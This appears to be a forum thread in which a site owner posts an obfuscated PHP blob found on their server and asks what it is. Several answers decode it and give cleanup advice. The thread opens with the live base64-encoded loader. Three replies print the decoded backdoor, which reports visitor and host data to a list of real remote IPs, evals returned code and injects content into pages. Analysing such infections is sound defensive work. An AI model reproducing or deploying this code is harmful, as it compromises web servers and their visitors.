YTFwdFJqQmhSMVo1VFd4MFpFbEVNR2RKYWxFeVRHcE5NMHhxUlRKUFV6UXhUbWxKTjBwSFdtaGtSMmhzWTJwS1lsaFRRVGxKUTBrMVRrTTBlVTVFU1hWTmFsVXhUR3BOTVVscWMydGFiVVl3WVVkV2VVMXNkR1JKUkRCblNXcEZNMDlETkhoT2FrbDFUVlJKTlV4cVNYbE5lVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1hwTlV6UjRUMFJSZFUxcVRUQk1hbXN5U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFtTXpUR3ByTVV4cVJUUk1ha1UwVDFOSk4wcEhXbWhrUjJoc1kycEtZbGhUUVRsSlEwazFUWGswZUU1NlFYVk5WRTB6VEdwSmVVbHFjMnRhYlVZd1lVZFdlVTFzZEdSSlJEQm5TV3BGTkU5RE5EQk5RelExVGxNMGVVNUVVV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxVWF6Vk1ha1Y0VGxNMGVVMTZSWFZPVkdkcFQzbFNiVmxZVW05YVdFbDVWekV3WjFCVFFXbFBSRWwxVFZScmVVeHFaek5NYWtVelQwTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw1VFZSWmRVMXFVVEpNYW1zMVRHcEplRTVUU1RkS1IxcG9aRWRvYkdOcVNtSllVMEU1U1VOSk5VNVROSGxOVkVWMVRWUm5kVTU2YTJsUE0wNXZaRmRhYldKSFZXOUtSMXBvWkVkb2JHTnFTWEJQTWxwMlkyMVdhRmt5WjI5S1IxcG9aRWRvYkdOcVNXZFpXRTFuU2toV2VVdFlkSEJhYVVGdlNVZEdiMXB1Vm10YWJYaHRaVzFTYjFwdGFIcExRMUl4WTJsclowdFRRamRKUjBwNVdsZEdja2xFZERsbVdEQTlJaWtwT3lBPSIpKTsg")); ";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>
I have no idea what it is and it's impossible to decipher. Nothing is output when you access the file directly online. Any ideas? Does it seem malicious?
If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,
Clean all your files.
Switch to secure FTP access immediately
Do some more research on internet about this attack and see what other actions you need to take.
You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.
You most certainly got hacked.
I did the fun to poke into the code.
The code is base64_encoded multiple times and then eval'd. Result is:
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}
return $buf;}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);}
else {
$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];} else {
$host = "";}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];} else {
$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);}
else {
$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
else {
$ua = "";}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);}
else {$qs = "";}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);}
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();}
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);
return true;}
else {
return false;}}
$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
Yes it is malicious code, its a bunch of base64 encoded stings evaled, and the resulting code is:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}return $buf;}function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);unlink($tmpfname);
$contents = gzencode($contents);
} else {$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
$ua = "";
}if (
isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";}
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;}}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
}
?>
To expand on my comment...
Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...
If you wrote the site from scratch, look down.
Are you the only developer?
(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.
(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.
As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.
Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.
The code is:
if (!function_exists("GetMama"))
{
function mod_con($buf){
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
return $buf;
}
return $buf;
}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
}
else {
$contents = mod_con($buf);
}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;
}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(FILE);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
else {
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
}
else {
$qs = "";
}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); e
val($z);
exit();
}
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
}
else {
return false;
}
}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
Unpacked by hand so its more readable :)

Categories